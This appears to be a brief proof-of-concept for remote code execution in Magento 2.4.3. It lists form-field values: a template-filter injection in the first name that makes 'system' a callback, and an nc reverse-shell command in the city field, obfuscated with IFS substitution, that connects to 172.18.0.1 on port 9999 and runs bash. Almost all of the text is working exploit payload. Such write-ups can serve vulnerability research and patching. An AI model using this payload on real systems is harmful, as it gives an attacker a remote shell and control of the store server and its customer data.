Tested with: magento 2.4.3 and sample data Docker image: docker.io/bitnami/magento:2.4.3-debian-10-r0
First Name:
{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}
Last Name:
system
City:
nc${IFS%??}172.18.0.1${IFS%??}9999${IFS%??}-e${IFS%??}/bin/bash
Testing rce:
